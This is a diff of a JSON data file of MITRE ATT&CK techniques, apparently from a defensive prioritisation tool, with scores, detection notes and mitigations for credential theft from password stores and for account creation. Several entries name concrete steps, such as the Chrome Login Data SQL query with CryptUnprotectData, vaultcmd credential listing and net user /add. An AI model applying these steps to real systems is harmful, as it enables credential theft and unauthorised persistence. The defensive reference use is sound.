-                "detection": "If an adversary is using a standard command-line shell (i.e. [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003)), analysts may detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command or similar artifacts. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts may detect token manipulation only through careful analysis of user activity, examination of running processes, and correlation with other endpoint and network behavior.\n\nAnalysts can also monitor for use of Windows APIs such as CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.",
+                "tid": "T1555.002",
+                "name": "Credentials from Password Stores: Securityd Memory",
+                "url": "https://attack.mitre.org/techniques/T1555/002",
+                "description": "An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain) (Citation: OSX Keydnap malware)\n\nIn OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)",
+                "detection": "Monitor processes and command-line arguments for activity surrounded users searching for credentials or using automated tools to scan memory for passwords.",
+                "mitigations": []
+            },
+            {
+                "tid": "T1555.003",
+                "name": "Credentials from Password Stores: Credentials from Web Browsers",
+                "url": "https://attack.mitre.org/techniques/T1555/003",
+                "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018)\n \nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).\n\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).",
+                "detection": "Identify web browser files that contain credentials such as Google Chrome’s Login Data database file: AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data. Monitor file read events of web browser files that contain credentials, especially when the reading process is unrelated to the subject web browser. Monitor process execution logs to include PowerShell Transcription focusing on those that perform a combination of behaviors including reading web browser process memory, utilizing regular expressions, and those that contain numerous keywords for common web applications (Gmail, Twitter, Office365, etc.).",
                 "mitigations": [
                     {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
+                        "mid": "M1027",
+                        "name": "Password Policies",
+                        "description": "Set and enforce secure password policies for accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1027"
                     }
                 ]
             },
             {
-                "tid": "T1134.003",
-                "name": "Access Token Manipulation: Make and Impersonate Token",
-                "url": "https://attack.mitre.org/techniques/T1134/003",
-                "description": "Adversaries may make and impersonate tokens to escalate privileges and bypass access controls. If an adversary has a username and password but the user is not logged onto the system, the adversary can then create a logon session for the user using the LogonUser function. The function will return a copy of the new session's access token and the adversary can use SetThreadToken to assign the token to a thread.",
-                "detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.\n\nAnalysts can also monitor for use of Windows APIs such as LogonUser and  SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.",
+                "tid": "T1555.004",
+                "name": "Credentials from Password Stores: Windows Credential Manager",
+                "url": "https://attack.mitre.org/techniques/T1555/004",
+                "description": "Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)\n\nThe Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.\n\nCredential Lockers store credentials in encrypted .vcrd files, located under %Systemdrive%\\Users\\\\[Username]\\AppData\\Local\\Microsoft\\\\[Vault/Credentials]\\. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)\n\nAdversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may gather credentials by reading files located inside of the Credential Lockers. Adversaries may also abuse Windows APIs such as CredEnumerateA to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)\n\nAdversaries may use password recovery tools to obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)",
+                "detection": "Monitor process and command-line parameters of vaultcmd.exe for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., vaultcmd /listcreds:“Windows Credentials”).(Citation: Malwarebytes The Windows Vault)\n\nConsider monitoring API calls such as CredEnumerateA that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)\n\nConsider monitoring file reads to Vault locations, %Systemdrive%\\Users\\\\[Username]\\AppData\\Local\\Microsoft\\\\[Vault/Credentials]\\, for suspicious activity.(Citation: Malwarebytes The Windows Vault)",
                 "mitigations": [
                     {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
                     }
                 ]
             },
             {
-                "tid": "T1134.004",
-                "name": "Access Token Manipulation: Parent PID Spoofing",
-                "url": "https://attack.mitre.org/techniques/T1134/004",
-                "description": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)\n\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)\n\nExplicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)",
-                "detection": "Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)\n\nMonitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.",
-                "mitigations": []
-            },
-            {
-                "tid": "T1134.005",
-                "name": "Access Token Manipulation: SID-History Injection",
-                "url": "https://attack.mitre.org/techniques/T1134/005",
-                "description": "Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).\n\nWith Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).",
-                "detection": "Examine data in user’s SID-History attributes using the PowerShell Get-ADUser cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)\n\nMonitor for Windows API calls to the DsAddSidHistory function. (Citation: Microsoft DsAddSidHistory)",
+                "tid": "T1555.005",
+                "name": "Credentials from Password Stores: Password Managers",
+                "url": "https://attack.mitre.org/techniques/T1555/005",
+                "description": "Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)\n\nAdversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)\n Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)",
+                "detection": "Consider monitoring API calls, file read events, and processes for suspicious activity that could indicate searching in process memory of password managers. \n\nConsider monitoring file reads surrounding known password manager applications.",
                 "mitigations": [
                     {
-                        "mid": "M1015",
-                        "name": "Active Directory Configuration",
-                        "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1015"
+                        "mid": "M1027",
+                        "name": "Password Policies",
+                        "description": "Set and enforce secure password policies for accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1027"
+                    },
+                    {
+                        "mid": "M1054",
+                        "name": "Software Configuration",
+                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                        "url": "https://attack.mitre.org/mitigations/M1054"
+                    },
+                    {
+                        "mid": "M1051",
+                        "name": "Update Software",
+                        "description": "Perform regular software updates to mitigate exploitation risk.",
+                        "url": "https://attack.mitre.org/mitigations/M1051"
                     }
                 ]
             }
         ],
         "mitigations": [
             {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
-            },
-            {
-                "mid": "M1018",
-                "name": "User Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1018"
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
             }
         ],
-        "cumulative_score": 0.4169948442857143,
-        "adjusted_score": 0.4169948442857143,
+        "cumulative_score": 0.5123808019047619,
+        "adjusted_score": 0.5123808019047619,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "5.2"
+        ],
+        "nist_controls": [
+            "CA-7",
+            "IA-5",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.06190476190476191,
+            "mitigation_score": 0.07272727272727272,
+            "detection_score": 0.05
+        },
+        "choke_point_score": 0.25,
+        "prevalence_score": 0.20047604
+    },
+    {
+        "tid": "T1555.001",
+        "name": "Credentials from Password Stores: Keychain",
+        "description": "Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/. (Citation: Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.\n\nTo manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.",
+        "url": "https://attack.mitre.org/techniques/T1555/001",
+        "tactics": [
+            "Credential Access"
+        ],
+        "detection": "Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.",
+        "platforms": [
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Access",
+            "Process: OS API Execution"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1555",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            }
+        ],
+        "cumulative_score": 0.1380952380952381,
+        "adjusted_score": 0.1380952380952381,
         "has_car": false,
         "has_sigma": false,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
-            "4.1",
-            "4.7",
-            "5.3",
-            "5.4",
-            "6.1",
-            "6.2",
-            "6.8"
+            "5.2"
         ],
         "nist_controls": [
-            "AC-2",
-            "AC-3",
-            "AC-5",
-            "AC-6",
-            "CM-5",
-            "CM-6",
-            "IA-2"
+            "CA-7",
+            "IA-5",
+            "SI-4"
         ],
         "process_coverage": true,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.2142857142857143,
-            "mitigation_score": 0.2545454545454545,
-            "detection_score": 0.17
-        },
-        "choke_point_score": 0.2,
-        "prevalence_score": 0.00270913
+        "hardware_coverage": false
     },
     {
-        "tid": "T1135",
-        "name": "Network Share Discovery",
-        "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \n\nFile sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\\\\\\\remotesystem command. It can also be used to query shared drives on the local system using net share. For macOS, the sharing -l command lists all shared points used for smb services.",
-        "url": "https://attack.mitre.org/techniques/T1135",
+        "tid": "T1555.002",
+        "name": "Credentials from Password Stores: Securityd Memory",
+        "description": "An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain) (Citation: OSX Keydnap malware)\n\nIn OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)",
+        "url": "https://attack.mitre.org/techniques/T1555/002",
         "tactics": [
-            "Discovery"
+            "Credential Access"
         ],
-        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "detection": "Monitor processes and command-line arguments for activity surrounded users searching for credentials or using automated tools to scan memory for passwords.",
         "platforms": [
             "Linux",
-            "Windows",
             "macOS"
         ],
         "data_sources": [
             "Command: Command Execution",
-            "Process: OS API Execution",
-            "Process: Process Creation"
+            "Process: Process Access"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1555",
         "subtechniques": [],
-        "mitigations": [
-            {
-                "mid": "M1028",
-                "name": "Operating System Configuration",
-                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                "url": "https://attack.mitre.org/mitigations/M1028"
-            }
-        ],
-        "cumulative_score": 0.20741303476190476,
-        "adjusted_score": 0.20741303476190476,
+        "mitigations": [],
+        "cumulative_score": 0.1619047619047619,
+        "adjusted_score": 0.1619047619047619,
         "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
-        "has_splunk": false,
-        "cis_controls": [
-            "4.1",
-            "18.3",
-            "18.5"
-        ],
+        "has_splunk": true,
+        "cis_controls": [],
         "nist_controls": [
-            "CM-6",
-            "CM-7",
+            "CA-7",
+            "IA-5",
             "SI-4"
         ],
         "process_coverage": true,
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.10476190476190475,
-            "mitigation_score": 0.10909090909090909,
-            "detection_score": 0.1
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.00265113
+        "hardware_coverage": false
     },
     {
-        "tid": "T1136",
-        "name": "Create Account",
-        "description": "Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.\n\nAccounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.",
-        "url": "https://attack.mitre.org/techniques/T1136",
+        "tid": "T1555.003",
+        "name": "Credentials from Password Stores: Credentials from Web Browsers",
+        "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018)\n \nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).\n\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).",
+        "url": "https://attack.mitre.org/techniques/T1555/003",
         "tactics": [
-            "Persistence"
+            "Credential Access"
         ],
-        "detection": "Monitor for processes and command-line parameters associated with account creation, such as net user or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.\n\nCollect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.",
+        "detection": "Identify web browser files that contain credentials such as Google Chrome’s Login Data database file: AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data. Monitor file read events of web browser files that contain credentials, especially when the reading process is unrelated to the subject web browser. Monitor process execution logs to include PowerShell Transcription focusing on those that perform a combination of behaviors including reading web browser process memory, utilizing regular expressions, and those that contain numerous keywords for common web applications (Gmail, Twitter, Office365, etc.).",
         "platforms": [
-            "Azure AD",
-            "Google Workspace",
-            "IaaS",
             "Linux",
-            "Office 365",
             "Windows",
             "macOS"
         ],
         "data_sources": [
             "Command: Command Execution",
-            "Process: Process Creation",
-            "User Account: User Account Creation"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1136.001",
-                "name": "Create Account: Local Account",
-                "url": "https://attack.mitre.org/techniques/T1136/001",
-                "description": "Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account.\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.",
-                "detection": "Monitor for processes and command-line parameters associated with local account creation, such as net user /add , useradd , and dscl -create . Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary.",
-                "mitigations": [
-                    {
-                        "mid": "M1032",
-                        "name": "Multi-factor Authentication",
-                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                        "url": "https://attack.mitre.org/mitigations/M1032"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    }
-                ]
-            },
-            {
-                "tid": "T1136.002",
-                "name": "Create Account: Domain Account",
-                "url": "https://attack.mitre.org/techniques/T1136/002",
-                "description": "Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.",
-                "detection": "Monitor for processes and command-line parameters associated with domain account creation, such as net user /add /domain. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain accounts to detect suspicious accounts that may have been created by an adversary.",
-                "mitigations": [
-                    {
-                        "mid": "M1032",
-                        "name": "Multi-factor Authentication",
-                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                        "url": "https://attack.mitre.org/mitigations/M1032"
-                    },
-                    {
-                        "mid": "M1030",
-                        "name": "Network Segmentation",
-                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                        "url": "https://attack.mitre.org/mitigations/M1030"
-                    },
-                    {
-                        "mid": "M1028",
-                        "name": "Operating System Configuration",
-                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1028"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    }
-                ]
-            },
-            {
-                "tid": "T1136.003",
-                "name": "Create Account: Cloud Account",
-                "url": "https://attack.mitre.org/techniques/T1136/003",
-                "description": "Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)\n\nAdversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.",
-                "detection": "Collect usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.",
-                "mitigations": [
-                    {
-                        "mid": "M1032",
-                        "name": "Multi-factor Authentication",
-                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                        "url": "https://attack.mitre.org/mitigations/M1032"
-                    },
-                    {
-                        "mid": "M1030",
-                        "name": "Network Segmentation",
-                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                        "url": "https://attack.mitre.org/mitigations/M1030"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    }
-                ]
-            }
+            "File: File Access",
+            "Process: OS API Execution",
+            "Process: Process Access"
         ],
+        "is_subtechnique": true,
+        "supertechnique": "T1555",
+        "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1032",
-                "name": "Multi-factor Authentication",
-                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                "url": "https://attack.mitre.org/mitigations/M1032"
-            },
-            {
-                "mid": "M1030",
-                "name": "Network Segmentation",
-                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                "url": "https://attack.mitre.org/mitigations/M1030"
-            },
-            {
-                "mid": "M1028",
-                "name": "Operating System Configuration",
-                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                "url": "https://attack.mitre.org/mitigations/M1028"
-            },
-            {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
             }
         ],
-        "cumulative_score": 0.6693437690476189,
-        "adjusted_score": 0.6693437690476189,
+        "cumulative_score": 0.1380952380952381,
